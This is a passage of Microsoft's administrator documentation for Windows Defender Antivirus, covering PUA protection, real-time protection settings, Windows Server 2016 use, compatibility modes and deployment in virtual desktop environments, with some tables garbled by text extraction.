See Configure device restriction settings in Microsoft Intune and Windows Defender Antivirus device restriction
settings for Windows 10 in Intune for more details.
Use Configuration Manager to configure PUA protection:
PUA protection is enabled by default in System Center Configuration Manager (current branch), including version
1606 and later.
See How to create and deploy antimalware policies: Scheduled scans settings for details on configuring System
For Configuration Manager 2012, see How to Deploy Potentially Unwanted Application Protection Policy for
Endpoint Protection in Configuration Manager.
NOTE
PUA events are reported in the Windows Event Viewer and not in System Center Configuration Manager.
Use Group Policy to configure PUA protection:

templates.
3. Expand the tree to Windows components > Windows Defender Antivirus.
4. Double-click Configure protection for potentially unwanted applications.
5. Click Enabled to enable PUA protection.
6. In Options, select Block to block potentially unwanted applications, or select Audit Mode to test how the
setting will work in your environment. Click OK.
Use PowerShell cmdlets to configure PUA protection:
Use the following cmdlet:
Set-MpPreference -PUAProtection
Setting the value for this cmdlet to Enabled will turn the feature on if it has been disabled.
Setting AuditMode will detect PUAs but will not block them.
Related topics
Next gen protection
Enable and configure antivirus always-on
protection and monitoring
Applies to:
Always-on protection consists of real-time protection, behavior monitoring, and heuristics to identify
malware based on known suspicious and malicious activities.
These activities include events such as processes making unusual changes to existing files, modifying or
creating automatic startup registry keys and startup locations (also known as auto-start extensibility points,
or ASEPs), and other changes to the file system or file structure.
Configure and enable always-on protection

You can configure how always-on protection works with the Group Policy settings described in this section.
To configure these settings:
1. On your Group Policy management computer, open the Group Policy Management Console, right-
click the Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration and click
Administrative templates.
3. Expand the tree to Windows components > Windows Defender Antivirus and then the Location
specified in the table below.
4. Double-click the policy Setting as specified in the table below, and set the option to your desired
configuration. Click OK and repeat for any other settings.
DEFAULT SETTING (IF NOT

LOCATION SETTING DESCRIPTION CONFIGURED)
Real-time protection Monitor file and program The Windows Defender Enabled
activity on your computer Antivirus engine makes
note of any file changes
(file writes, such as moves,
copies, or modifications)
and general program
activity (programs that are
opened or running and
that cause other programs
to run)
Real-time protection Scan all downloaded files Downloaded files and Enabled
and attachments attachments are
automatically scanned. This
operates in addition to the
SmartScreen filter, which
scans files before and
during downloading
Real-time protection Turn on process scanning You can independently Enabled

whenever real-time enable the Windows
protection is enabled Defender Antivirus engine
to scan running processes
for suspicious modifications
or behaviors. This is useful
if you have temporarily
disabled real-time
protection and want to
automatically scan
processes that started
while it was disabled
Real-time protection Turn on behavior The AV engine will monitor Enabled

monitoring file processes, file and
registry changes, and other
events on your endpoints
for suspicious and known
malicious activity
Real-time protection Turn on raw volume write Information about raw Enabled
notifications volume writes will be
analyzed by behavior
monitoring
Real-time protection Define the maximum size You can define the size in Enabled
of downloaded files and kilobytes
attachments to be scanned
Real-time protection Configure monitoring for Specify whether monitoring Enabled (both directions)
incoming and outgoing file should occur on incoming,
and program activity outgoing, both, or neither
direction. This is relevant
for Windows Server
installations where you
have defined specific
servers or Server Roles that
see large amounts of file
changes in only one
direction and you want to
improve network
performance. Note that
fully updated endpoints
(and servers) on a network
will see little performance
impact irrespective of the
number or direction of file
changes.
Scan Turn on heuristics Heuristic protection will Enabled

disable or block suspicious
activity immediately before
the Windows Defender
Antivirus engine is asked to
detect the activity
Root Allow antimalware service You can lower the priority Enabled
to startup with normal of the Windows Defender
priority Antivirus engine, which
may be useful in
lightweight deployments
where you want to have as
lean a startup process as
possible. This may impact
protection on the
endpoint.
Root Allow antimalware service If protection updates have Disabled

to remain running always been disabled, you can set
Windows Defender
Antivirus to still run. This
lowers the protection on
the endpoint.
Disable real-time protection

WARNING
Disabling real-time protection will drastically reduce the protection on your endpoints and is not recommended.
The main real-time protection capability is enabled by default, but you can disable it with Group Policy:
Use Group Policy to disable real-time protection:
1. On your Group Policy management computer, open the Group Policy Management Console, right-
2. In the Group Policy Management Editor go to Computer configuration and click
Administrative templates.
3. Expand the tree to Windows components > Windows Defender Antivirus > Real-time
protection.
4. Double-click the Turn off real-time protection setting and set the option to Enabled. Click OK.
Related topics
Windows Defender Antivirus on Windows Server
2016
Applies to:
Windows Defender Antivirus is available on Windows Server 2016. In some instances it is referred to as Endpoint
Protection - however, the protection engine is the same.
While the functionality, configuration, and management is largely the same for Windows Defender AV either on
Windows 10 or Windows Server 2016, there are a few key differences:
In Windows Server 2016, automatic exclusions are applied based on your defined Server Role.
In Windows Server 2016, Windows Defender AV will not disable itself if you are running another antivirus
product.
This topic includes the following instructions for setting up and running Windows Defender AV on a server
platform:
Enable the interface
Verify Windows Defender AV is running
Update antimalware Security intelligence
Submit Samples
Configure automatic exclusions
Enable or disable the interface on Windows Server 2016

By default, Windows Defender AV is installed and functional on Windows Server 2016. The user interface is
installed by default on some SKUs, but is not required.
NOTE
You can't uninstall the Windows Security app, but you can disable the interface with these instructions.
If the interface is not installed, you can add it in the Add Roles and Features Wizard at the Features step, under
Windows Defender Features by selecting the GUI for Windows Defender option.
See the Install or uninstall roles, role services, or features topic for information on using the wizard.
The following PowerShell cmdlet will also enable the interface:
Install-WindowsFeature -Name Windows-Defender-GUI
To hide the interface, use the Remove Roles and Features Wizard and deselect the GUI for Windows
Defender option at the Features step, or use the following PowerShell cmdlet:
Uninstall-WindowsFeature -Name Windows-Defender-GUI
IMPORTANT
Windows Defender AV will still run normally without the user interface, but the user interface cannot be enabled if you
disable the core Windows Defender feature.
Install or uninstall Windows Defender AV on Windows Server 2016

You can also uninstall Windows Defender AV completely with the Remove Roles and Features Wizard by
deselecting the Windows Defender Features option at the Features step in the wizard.
This is useful if you have a third-party antivirus product installed on the machine already. Multiple AV products
can cause problems when installed and actively running on the same machine. See the question "Should I run
Microsoft security software at the same time as other security products?" on the Windows Defender Security
Intelligence Antivirus and antimalware software FAQ.
NOTE
Deselecting Windows Defender on its own under the Windows Defender Features section will automatically prompt you
to remove the interface option GUI for Windows Defender.
The following PowerShell cmdlet will also uninstall Windows Defender AV on Windows Server 2016:
Uninstall-WindowsFeature -Name Windows-Defender
To install Windows Defender AV again, use the Add Roles and Features Wizard and ensure the Windows
Defender feature is selected. You can also enable the interface by selecting the GUID for Windows Defender
option.
You can also use the following PowerShell cmdlet to install Windows Defender AV:
Install-WindowsFeature -Name Windows-Defender
TIP
Event messages for the antimalware engine included with Windows Defender AV can be found in Windows Defender AV
Events.
Verify Windows Defender is running

To verify that Windows Defender AV is running on the server, run the following command from a command
prompt:
sc query Windefend
The sc query command returns information about the Windows Defender service. If Windows Defender is
running, the STATE value displays RUNNING .
Update antimalware Security intelligence

In order to get updated antimalware Security intelligence , you must have the Windows Update service running. If
you use an update management service, like Windows Server Update Services (WSUS ), make sure that updates
for Windows Defender Antivirus Security intelligence are approved for the computers you manage.
By default, Windows Update does not download and install updates automatically on Windows Server 2016. You
can change this configuration by using one of the following methods:
Windows Update in Control Panel.
Install updates automatically results in all updates being automatically installed, including
Windows Defender Security intelligence updates.
Download updates but let me choose whether to install them allows Windows Defender to
download and install Security intelligence updates automatically, but other updates are not
automatically installed.
Group Policy. You can set up and manage Windows Update by using the settings available in Group
Policy, in the following path: Administrative Templates\Windows Components\Windows
Update\Configure Automatic Updates
The AUOptions registry key. The following two values allow Windows Update to automatically download
and install Security intelligence updates.
4 Install updates automatically. This value results in all updates being automatically installed,
including Windows Defender Security intelligence updates.
3 Download updates but let me choose whether to install them. This value allows Windows
Defender to download and install Security intelligence updates automatically, but other updates are
not automatically installed.
To ensure that protection from malware is maintained, we recommend that you enable the following services:
Windows Error Reporting service
Windows Update service
The following table lists the services for Windows Defender and the dependent services.
SERVICE NAME FILE LOCATION DESCRIPTION
Windows Defender Service (Windefend) C:\Program Files\Windows This is the main Windows Defender
Defender\MsMpEng.exe Antivirus service that needs to be
running at all times.
Windows Error Reporting Service C:\WINDOWS\System32\svchost.exe -k This service sends error reports back to
(Wersvc) WerSvcGroup Microsoft.
Windows Defender Firewall (MpsSvc) C:\WINDOWS\system32\svchost.exe -k We recommend leaving the Windows

LocalServiceNoNetwork Defender Firewall service enabled.
Windows Update (Wuauserv) C:\WINDOWS\system32\svchost.exe -k Windows Update is needed to get

netsvcs Security intelligence updates and
antimalware engine updates
Submit Samples
Sample submission allows Microsoft to collect samples of potentially malicious software. To help provide
continued and up-to-date protection, Microsoft researchers use these samples to analyze suspicious activities and
produce updated antimalware Security intelligence.
We collect program executable files, such as .exe files and .dll files. We do not collect files that contain personal
data, like Microsoft Word documents and PDF files.
Enable automatic sample submission
To enable automatic sample submission, start a Windows PowerShell console as an administrator, and set
the SubmitSamplesConsent value data according to one of the following settings:
0 Always prompt. The Windows Defender service prompts you to confirm submission of all required
files. This is the default setting for Windows Defender, but is not recommended for Windows Server
2016 installations without a GUI.
1 Send safe samples automatically. The Windows Defender service sends all files marked as "safe"
and prompts for the remainder of the files.
2 Never send. The Windows Defender service does not prompt and does not send any files.
3 Send all samples automatically. The Windows Defender service sends all files without a prompt for
confirmation.
Configure automatic exclusions

To help ensure security and performance, certain exclusions are automatically added based on the roles and
features you install when using Windows Defender AV on Server 2016.
See the Configure exclusions in Windows Defender AV on Windows Server topic for more information.
Related topics
Configure exclusions in Windows Defender AV on Windows Server
Windows Defender Antivirus compatibility
Applies to:
Windows Defender Antivirus is automatically enabled and installed on endpoints and devices that are
running Windows 10.
However, on endpoints and devices that are protected with a non-Microsoft antivirus or antimalware app,
Windows Defender Antivirus will automatically disable itself. You can then choose to enable an optional,
limited protection feature, called limited periodic scanning.
If you are also using Windows Defender Advanced Threat Protection, then Windows Defender AV will enter
a passive mode.
The following matrix illustrates the states that Windows Defender AV will enter when third-party antivirus
products or Windows Defender ATP are also used.
ANTIMALWARE PROTECTION ORGANIZATION ENROLLED WINDOWS DEFENDER AV

WINDOWS VERSION OFFERED BY IN WINDOWS DEFENDER ATP STATE
Windows 10 A third-party product that Yes Passive mode

is not offered or developed
by Microsoft
Windows 10 A third-party product that No Automatic disabled mode

by Microsoft
Windows 10 Windows Defender AV Yes Active mode
Windows 10 Windows Defender AV No Active mode
Windows Server 2016 A third-party product that Yes Active mode[1]

by Microsoft
Windows Server 2016 A third-party product that No Active mode[1]

by Microsoft
Windows Server 2016 Windows Defender AV Yes Active mode
Windows Server 2016 Windows Defender AV No Active mode
(1) On Windows Server 2016, Windows Defender AV will not enter passive or disabled mode if you have
also installed a third-party antivirus product. If you install a third-party antivirus product, you should
uninstall Windows Defender AV on Windows Server 2016 to prevent problems caused by having multiple
antivirus products installed on a machine.
See the Windows Defender Antivirus on Windows Server 2016 topic for key differences and management
options for Windows Server installations.
IMPORTANT
Windows Defender AV is only available on endpoints running Windows 10 or Windows Server 2016.
In Windows 8.1 and Windows Server 2012, enterprise-level endpoint antivirus protection is offered as System Center
Endpoint Protection, which is managed through System Center Configuration Manager.
Windows Defender is also offered for consumer devices on Windows 8.1 and Windows Server 2012, although it does
not provide enterprise-level management (or an interface on Windows Server 2012 Server Core installations).
This table indicates the functionality and features that are available in each state:
REAL-TIME FILE
PROTECTION LIMITED SCANNING
AND CLOUD- PERIODIC AND SECURITY
DELIVERED SCANNING DETECTION THREAT INTELLIGENCE
STATE DESCRIPTION PROTECTION AVAILABILITY INFORMATION REMEDIATION UPDATES
Passive mode Windows

Defender AV
will not be
used as the
antivirus app,
and threats
will not be
remediated
by Windows
Defender AV.
Files will be
scanned and
reports will
be provided
for threat
detections
which are
shared with
the Windows
Defender ATP
service.
Automatic Windows
disabled Defender AV
mode will not be
used as the
antivirus app.
Files will not
be scanned
and threats
will not be
remediated.
REAL-TIME FILE
PROTECTION LIMITED SCANNING
AND CLOUD- PERIODIC AND SECURITY
DELIVERED SCANNING DETECTION THREAT INTELLIGENCE
STATE DESCRIPTION PROTECTION AVAILABILITY INFORMATION REMEDIATION UPDATES
Active mode Windows

Defender AV
is used as the
antivirus app
on the
machine. All
configuration
made with
Configuratio
n Manager,
Group Policy,
Intune, or
other
management
products will
apply. Files
will be
scanned and
threats
remediated,
and
detection
information
will be
reported in
your
configuration
tool (such as
Configuratio
n Manager
or the
Windows
Defender AV
app on the
machine
itself).
If you are enrolled in Windows Defender ATP and you are using a third party antimalware product then
passive mode is enabled because the service requires common information sharing from the Windows
Defender AV service in order to properly monitor your devices and network for intrusion attempts and
attacks.
Automatic disabled mode is enabled so that if the protection offered by a third-party antivirus product
expires or otherwise stops providing real-time protection from viruses, malware or other threats, Windows
Defender AV will automatically enable itself to ensure antivirus protection is maintained on the endpoint. It
also allows you to enable limited periodic scanning, which uses the Windows Defender AV engine to
periodically check for threats in addition to your main antivirus app.
In passive and automatic disabled mode, you can still manage updates for Windows Defender AV, however
you can't move Windows Defender AV into the normal active mode if your endpoints have an up-to-date
third-party product providing real-time protection from malware.
If you uninstall the other product, and choose to use Windows Defender AV to provide protection to your
endpoints, Windows Defender AV will automatically return to its normal active mode.
WARNING
You should not attempt to disable, stop, or modify any of the associated services used by Windows Defender AV,
Windows Defender ATP, or the Windows Security app.
This includes the wscsvc, SecurityHealthService, MsSense, Sense, WinDefend, or MsMpEng services and process.
Manually modifying these services can cause severe instability on your endpoints and open your network to infections
and attacks.
It can also cause problems when using third-party antivirus apps and how their information is displayed in the
Windows Security app.
Related topics
Windows Defender Antivirus on Windows Server 2016
Use limited periodic scanning in Windows Defender
Antivirus
Applies to:
Limited periodic scanning is a special type of threat detection and remediation that can be enabled when you have
installed another antivirus product on a Windows 10 device.
It can only be enabled in certain situations. See Windows Defender Antivirus compatibility for more information
on when limited periodic scanning can be enabled, and how Windows Defender Antivirus works with other AV
products.
Microsoft does not recommend using this feature in enterprise environments. This is a feature primarily
intended for consumers. This feature only uses a very limited subset of the Windows Defender Antivirus
capabilities to detect malware, and will not be able to detect most malware and potentially unwanted software.
Also, management and reporting capabilities will be limited. Microsoft recommends enterprises choose their
primary antivirus solution and use it exclusively.
How to enable limited periodic scanning

By default, Windows Defender Antivirus will enable itself on a Windows 10 device if there is no other antivirus
product installed, or if the other product is out-of-date, expired, or not working correctly.
If Windows Defender Antivirus is enabled, the usual options will appear to configure it on that device:
If another antivirus product is installed and working correctly, Windows Defender Antivirus will disable itself. The
Windows Security app will change the Virus & threat protection section to show status about the AV product,
and provide a link to the product's configuration options:
Underneath any 3rd party AV products, a new link will appear as Windows Defender Antivirus options.
Clicking this link will expand to show the toggle that enables limited periodic scanning.
Sliding the swtich to On will show the standard Windows Defender AV options underneath the 3rd party AV
product. The limited periodic scanning option will appear at the bottom of the page.
Related topics
Deploy, manage, and report on Windows Defender
Antivirus
Applies to:
You can deploy, manage, and report on Windows Defender Antivirus in a number of ways.
Because the Windows Defender Antivirus client is installed as a core part of Windows 10, traditional
deployment of a client to your endpoints does not apply.
However, in most cases you will still need to enable the protection service on your endpoints with Microsoft
Intune, System Center Configuration Manager, Azure Security Center, or Group Policy Objects, which is
described in the following table.
You'll also see additional links for:
Managing Windows Defender Antivirus protection, including managing product and protection updates
Reporting on Windows Defender Antivirus protection
IMPORTANT
In most cases, Windows 10 will disable Windows Defender Antivirus if it finds another antivirus product that is running
and up-to-date. You must disable or uninstall third-party antivirus products before Windows Defender Antivirus will
function. If you re-enable or install third-party antivirus products, then Windows 10 automatically disables Windows
Defender Antivirus.
MANAGEMENT OPTIONS
(NETWORK-WIDE
CONFIGURATION AND POLICY
OR BASELINE DEPLOYMENT)
TOOL DEPLOYMENT OPTIONS (2) (3) REPORTING OPTIONS
Microsoft Intune Add endpoint protection Configure device restriction Use the Intune console to
settings in Intune settings in Intune manage devices
System Center Use the Endpoint With default and With the default
Configuration Manager (1) Protection point site customized antimalware Configuration Manager
system role and enable policies and client Monitoring workspace and
Endpoint Protection with management email alerts
custom client settings
Group Policy and Active Use a Group Policy Object Use Group Policy Objects Endpoint reporting is not
Directory (domain-joined) to deploy configuration (GPOs) to Configure available with Group Policy.
changes and ensure update options for You can generate a list of
Windows Defender Windows Defender Group Policies to determine
Antivirus is enabled. Antivirus and Configure if any settings or policies
Windows Defender features are not applied
MANAGEMENT OPTIONS
(NETWORK-WIDE
CONFIGURATION AND POLICY
OR BASELINE DEPLOYMENT)
TOOL DEPLOYMENT OPTIONS (2) (3) REPORTING OPTIONS
PowerShell Deploy with Group Policy, Use the Set-MpPreference Use the appropriate Get-
System Center and Update-MpSignature cmdlets available in the
Configuration Manager, or cmdlets available in the Defender module
manually on individual Defender module
endpoints.
Windows Management Deploy with Group Policy, Use the Set method of the Use the
Instrumentation System Center MSFT_MpPreference class MSFT_MpComputerStatus
Configuration Manager, or and the Update method of class and the get method
manually on individual the MSFT_MpSignature of associated classes in the
endpoints. class Windows Defender WMIv2
Provider
Microsoft Azure Deploy Microsoft Configure Microsoft Use Microsoft Antimalware

Antimalware for Azure in Antimalware for Virtual for Virtual Machines and
the Azure portal, by using Machines and Cloud Cloud Services with Azure
Visual Studio virtual Services with Azure PowerShell cmdlets to
machine configuration, or PowerShell cmdlets or use enable monitoring. You can
using Azure PowerShell code samples also review usage reports
cmdlets. You can also Install in Azure Active Directory to
Endpoint protection in determine suspicious
Azure Security Center activity, including the
Possibly infected devices
report and configure an
SIEM tool to report on
Windows Defender
Antivirus events and add
that tool as an app in AAD.
1. The availability of some functions and features, especially related to cloud-delivered protection, differ
between System Center Configuration Manager (Current Branch) and System Center Configuration
Manager 2012. In this library, we've focused on Windows 10, Windows Server 2016, and System
Center Configuration Manager (Current Branch). See Use Microsoft cloud-provided protection in
Windows Defender Antivirus for a table that describes the major differences. (Return to table)
2. In Windows 10, Windows Defender Antivirus is a component available without installation or
deployment of an additional client or service. It will automatically be enabled when third-party antivirus
products are either uninstalled or out of date (except on Windows Server 2016). Traditional deployment
therefore is not required. Deployment here refers to ensuring the Windows Defender Antivirus
component is available and enabled on endpoints or servers. (Return to table)
3. Configuration of features and protection, including configuring product and protection updates, are
further described in the Configure Windows Defender Antivirus features section in this library. (Return
to table)
In this section
TOPIC DESCRIPTION
TOPIC DESCRIPTION
Deploy and enable Windows Defender Antivirus protection While the client is installed as a core part of Windows 10,
and traditional deployment does not apply, you will still
need to enable the client on your endpoints with System
Center Configuration Manager, Microsoft Intune, or Group
Policy Objects.
Manage Windows Defender Antivirus updates and apply There are two parts to updating Windows Defender
baselines Antivirus: updating the client on endpoints (product
updates), and updating Security intelligence (protection
updates). You can update Security intelligence in a number
of ways, using System Center Configuration Manager,
Group Policy, PowerShell, and WMI.
Monitor and report on Windows Defender Antivirus You can use Microsoft Intune, System Center Configuration
protection Manager, the Update Compliance add-in for Microsoft
Operations Management Suite, or a third-party SIEM
product (by consuming Windows event logs) to monitor
protection status and create reports about endpoint
protection.
Deploy and enable Windows Defender Antivirus
Applies to:
Depending on the management tool you are using, you may need to specifically enable or configure Windows
Defender Antivirus protection.
See the table in Deploy, manage, and report on Windows Defender Antivirus for instructions on how to enable
protection with Microsoft Intune, System Center Configuration Manager, Group Policy, Active Directory, Microsoft
Azure, PowerShell cmdlets, and Windows Management Instruction (WMI).
Some scenarios require additional guidance on how to successfully deploy or configure Windows Defender
Antivirus protection, such as Virtual Desktop Infrastructure (VDI) environments.
The remaining topic in this section provides end-to-end advice and best practices for setting up Windows
Defender Antivirus on virtual machines (VMs) in a VDI or Remote Desktop Services (RDS ) environment.
Related topics
Deploy, manage updates, and report on Windows Defender Antivirus
Deployment guide for Windows Defender Antivirus in a virtual desktop infrastructure (VDI) environment
Deployment guide for Windows Defender Antivirus
in a virtual desktop infrastructure (VDI) environment
Applies to:
In addition to standard on-premises or hardware configurations, you can also use Windows Defender Antivirus in
a remote desktop (RDS ) or virtual desktop infrastructure (VDI) environment.
Boot storms can be a problem in large-scale VDIs; this guide will help reduce the overall network bandwidth and
performance impact on your hardware.
NOTE
We've recently introduced a new feature that helps reduce the network and CPU overhead ov VMs when obtaining security
intelligence updates. If you'd like to test this feature before it's released generally, download the PDF guide for VDI
performance improvement testing.
We recommend setting the following when deploying Windows Defender Antivirus in a VDI environment:
LOCATION SETTING SUGGESTED CONFIGURATION
Client interface Enable headless UI mode Enabled
Client interface Suppress all notifications Enabled
Scan Specify the scan type to use for a Enabled - Quick

scheduled scan
Root Randomize scheduled task times Enabled
Signature updates Turn on scan after signature update Enabled
Scan Turn on catch up quick scan Enabled
For more details on the best configuration options to ensure a good balance between performance and protection,
including detailed instructions for System Center Configuration Manager and Group Policy, see the Configure
endpoints for optimal performance section.
See the Microsoft Desktop virtualization site for more details on Microsoft Remote Desktop Services and VDI
support.
For Azure-based virtual machines, you can also review the Install Endpoint Protection in Azure Security Center
topic.
There are three main steps in this guide to help roll out Windows Defender Antivirus protection across your VDI:
1. Create and deploy the base image (for example, as a virtual hard disk (VHD )) that your virtual machines
(VMs) will use
2. Manage the base image and updates for your VMs
3. Configure the VMs for optimal protection and performance, including:
Randomize scheduled scans
Use quick scans
Prevent notifications
Disable scans from occurring after every update
Scan out-of-date machines or machines that have been offline for a while
IMPORTANT
While the VDI can be hosted on Windows Server 2012 or Windows Server 2016, the virtual machines (VMs) should be
running Windows 10, 1607 at a minimum, due to increased protection technologies and features that are unavailable in
earlier versions of Windows.
NOTE
When you manage Windows with System Center Configuration Manager, Windows Defender Antivirus protection will be
referred to as Endpoint Protection or System Center Endpoint Protection. See the Endpoint Protection section at the
Configuration Manager library for more information.
Create and deploy the base image

The main steps in this section include:
1. Create your standard base image according to your requirements
2. Apply Windows Defender AV protection updates to your base image
3. Seal or “lock” the image to create a “known-good” image
4. Deploy your image to your VMs
Create the base image
First, you should create your base image according to your business needs, applying or installing the relevant line
of business (LOB ) apps and settings as you normally would. Typically, this would involve creating a VHD or
customized .iso, depending on how you will deploy the image to your VMs.
Apply protection updates to the base image
After creating the image, you should ensure it is fully updated. See Configure Windows Defender in Windows 10
for instructions on how to update Windows Defender Antivirus protection via WSUS, Microsoft Update, the
MMPC site, or UNC file shares. You should ensure that your initial base image is also fully patched with Microsoft
and Windows updates and patches.
Seal the base image
When the base image is fully updated, you should run a quick scan on the image.
After running a scan and buliding the cache, remove the machine GUID that uniquely identifies the device in
telemetry for both Windows Defender Antivirus and the Microsoft Security Removal Tool. This key is located here:
'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RemovalTools\MRT'
Remove the string found in the 'GUID' value
This “sealing” or “locking” of the image helps Windows Defender Antivirus build a cache of known-good files and
avoid scanning them again on your VMs. In turn, this can help ensure performance on the VM is not impacted.
You can run a quick scan from the command line or via System Center Configuration Manager.
NOTE
Quick scan versus full scan Quick scan looks at all the locations where there could be malware registered to start with the
system, such as registry keys and known Windows startup folders. Combined with our always on real-time protection
capability - which reviews files when they are opened and closed, and whenever a user navigates to a folder – quick scan
helps provide strong coverage both for malware that starts with the system and kernel-level malware.
Therefore, when considering performance – especially for creating a new or updated image in preparation for deployment –
it makes sense to use a quick scan only. A full scan, however, can be useful on a VM that has encountered a malware threat
to identify if there are any inactive components lying around and help perform a thorough clean-up.
Deploy the base image

You'll then need to deploy the base image across your VDI. For example, you can create or clone a VHD from your
base image, and then use that VHD when you create or start your VMs.
The following references provide ways you can create and deploy the base image across your VDI:
Single image management for Virtual Desktop Collections
Using Hyper-V to create a Base OS image that can be used for VMs and VHDs
Plan for Hyper-V security in Windows Server 2016
Create a virtual machine in Hyper-V (with a VHD )
Build Virtual Desktop templates
Manage your VMs and base image

How you manage your VDI will affect the performance impact of Windows Defender AV on your VMs and
infrastructure.
Because Windows Defender Antivirus downloads protection updates every day, or based on your protection
update settings, network bandwidth can be a problem if multiple VMs attempt to download updates at the same
time.
Following the guidelines in this means the VMs will only need to download “delta” updates, which are the
differences between an existing Security intelligence set and the next one. Delta updates are typically much
smaller (a few kilobytes) than a full Security intelligence download (which can average around 150 mb).
Manage updates for persistent VDIs
If you are using a persistent VDI, you should update the base image monthly, and set up protection updates to be
delivered daily via a file share, as follows:
1. Create a dedicated file share location on your network that can be accessed by your VMs and your VM host
(or other, persistent machine, such as a dedicated admin console that you use to manage your VMs).
2. Set up a scheduled task on your VM host to automatically download updates from the MMPC website or
Microsoft Update and save them to the file share (the SignatureDownloadCustomTask PowerShell script
can help with this).
3. Configure the VMs to pull protection updates from the file share.
4. Disable or delay automatic Microsoft updates on your VMs. See Update Windows 10 in the enterprise for
information on managing operating system updates with WSUS, SCCM, and others.
5. On or just after each Patch Tuesday (the second Tuesday of each month), update your base image with the
latest protection updates from the MMPC website, WSUS, or Microsoft Update Also apply all other
Windows patches and fixes that were delivered on the Patch Tuesday. You can automate this by following
the instructions in Orchestrated offline VM Patching using Service Management Automation.
6. Run a quick scan on your base image before deploying it to your VMs.
A benefit to aligning your image update to the monthly Microsoft Update is that you ensure your VMs will have
the latest Windows security patches and other important Microsoft updates without each VM needing to
individually download them.
Manage updates for non-persistent VDIs
If you are using a non-persistent VDI, you can update the base image daily (or nightly) and directly apply the latest
updates to the image.
An example:
1. Every night or other time when you can safely take your VMs offline, update your base image with the
latest protection updates from the MMPC website, WSUS, or Microsoft Update.
2. Run a quick scan on your base image before deploying it to your VMs.
Configure endpoints for optimal performance

There are a number of settings that can help ensure optimal performance on your VMs and VDI without affecting
the level of protection, including:
Use quick scans
Disable scans from occurring after every update
Scan out-of-date machines or machines that have been offline for a while
These settings can be configured as part of creating your base image, or as a day-to-day management function of
your VDI infrastructure or network.
Windows Defender Antivirus supports the randomization of scheduled scans and Security intelligence updates.
This can be extremely helpful in reducing boot storms (especially when used in conjunction with Disable scans
from occurring after every update and Scan out-of-date machines or machines that have been offline for a while.
Scheduled scans run in addition to real-time protection and scanning.
The start time of the scan itself is still based on the scheduled scan policy – ScheduleDay, ScheduleTime,
ScheduleQuickScanTime.
Use Group Policy to randomize scheduled scan start times:
3. Click Policies then Administrative templates.
4. Expand the tree to Windows components > Windows Defender and configure the following setting:
Double-click Randomize scheduled task times and set the option to Enabled. Click OK. This adds a
true randomization (it is still random if the disk image is replicated) of plus or minus 30 minutes (using
all of the intervals) to the start of the scheduled scan and the Security intelligence update. For example, if
the schedule start time was set at 2.30pm, then enabling this setting could cause one machine to scan
and update at 2.33pm and another machine to scan and update at 2.14pm.
Use Configuration Manager to randomize scheduled scans:
See How to create and deploy antimalware policies: Advanced settings for details on configuring System Center
Configuration Manager (current branch).
See Schedule scans for other configuration options available for scheduled scans.
Use quick scans
You can specify the type of scan that should be performed during a scheduled scan. Quick scans are the preferred
approach as they are designed to look in all places where malware needs to reside to be active.
Use Group Policy to specify the type of scheduled scan:
4. Expand the tree to Windows components > Windows Defender > Scan and configure the following
setting:
Double-click Specify the scan type to use for a scheduled scan and set the option to Enabled and
Quick scan. Click OK.
Use Configuration Manager to specify the type of scheduled scan:
See How to create and deploy antimalware policies: Scheduled scans settings for details on configuring System
See Schedule scans for other configuration options available for scheduled scans.
Sometimes, Windows Defender Antivirus notifications may be sent to or persist across multiple sessions. In order
to minimize this problem, you can use the lock down the Windows Defender Antivirus user interface.
Use Group Policy to hide notifications:
4. Expand the tree to Windows components > Windows Defender > Client Interface and configure the
following settings:
Double-click Suppress all notifications and set the option to Enabled. Click OK. This prevents
notifications from Windows Defender AV appearing in the action center on Windows 10 when scans or
remediation is performed.
Double-click Enable headless UI mode and set the option to Enabled. Click OK. This hides the entire
Windows Defender AV user interface from users.
Use Configuration Manager to hide notifications:
1. On your System Center Configuration Manager console, open the antimalware policy you want to change
(click Assets and Compliance in the navigation pane on the left, then expand the tree to Overview >
Endpoint Protection > Antimalware Policies)
2. Go to the Advanced section and configure the following settings:
a. Set Disable the client user interface to Yes. This hides the entire Windows Defender AV user
interface.
b. Set Show notifications messages on the client computer... to Yes. This hides notifications from
appearing.
c. Click OK.
3. Deploy the updated policy as usual.
Disable scans after an update
This setting will prevent a scan from occurring after receiving an update. You can apply this when creating the
base image if you have also run a quick scan. This prevents the newly updated VM from performing a scan again
(as you've already scanned it when you created the base image).
IMPORTANT
Running scans after an update will help ensure your VMs are protected with the latest Security intelligence updates.
Disabling this option will reduce the protection level of your VMs and should only be used when first creating or deploying
the base image.
Use Group Policy to disable scans after an update:

4. Expand the tree to Windows components > Windows Defender > Signature Updates and configure
the following setting:
Double-click Turn on scan after signature update and set the option to Disabled. Click OK. This
prevents a scan from running immediately after an update.
Use Configuration Manager to disable scans after an update:
2. Go to the Scheduled scans section and configure the following setting:
3. Set Check for the latest Security intelligence updates before running a scan to No. This prevents a
scan after an update.
4. Click OK.
Scan VMs that have been offline
This setting will help ensure protection for a VM that has been offline for some time or has otherwise missed a
scheduled scan.
Use Group Policy to enable a catch-up scan:
4. Expand the tree to Windows components > Windows Defender > Scan and configure the following
setting:
5. Double-click the Turn on catch-up quick scan setting and set the option to Enabled. Click OK. This
forces a scan if the VM has missed two or more consecutive scheduled scans.
Use Configuration Manager to disable scans after an update:
2. Go to the Scheduled scans section and configure the following setting:
3. Set Force a scan of the selected scan type if client computer is offline during... to Yes. This forces a
scan if the VM has missed two or more consecutive scheduled scans.
4. Click OK.
Exclusions
On Windows Server 2016, Windows Defender Antivirus will automatically deliver the right exclusions for servers
running a VDI environment. However, if you are running an older Windows server version, you can refer to the
exclusions that are applied on this page:
Configure Windows Defender Antivirus exclusions on Windows Server
Additional resources
Video: Microsoft Senior Program Manager Bryan Keller on how System Center Configuration Manger 2012
manages VDI and integrates with App-V
TechNet forums on Remote Desktop Services and VDI
SignatureDownloadCustomTask PowerShell script
Report on Windows Defender Antivirus
Applies to:
There are a number of ways you can review protection status and alerts, depending on the management tool you
are using for Windows Defender Antivirus.
You can use System Center Configuration Manager to monitor Windows Defender Antivirus or create email alerts,
or you can also monitor protection using Microsoft Intune.
Microsoft Operations Management Suite has an Update Compliance add-in that reports on key Windows
Defender Antivirus issues, including protection updates and real-time protection settings.
If you have a third-party security information and event management (SIEM ) tool, you can also consume
Windows Defender client events.
Windows events comprise several security event sources, including Security Account Manager (SAM ) events
(enhanced for Windows 10, also see the Security audting topic) and Windows Defender events.
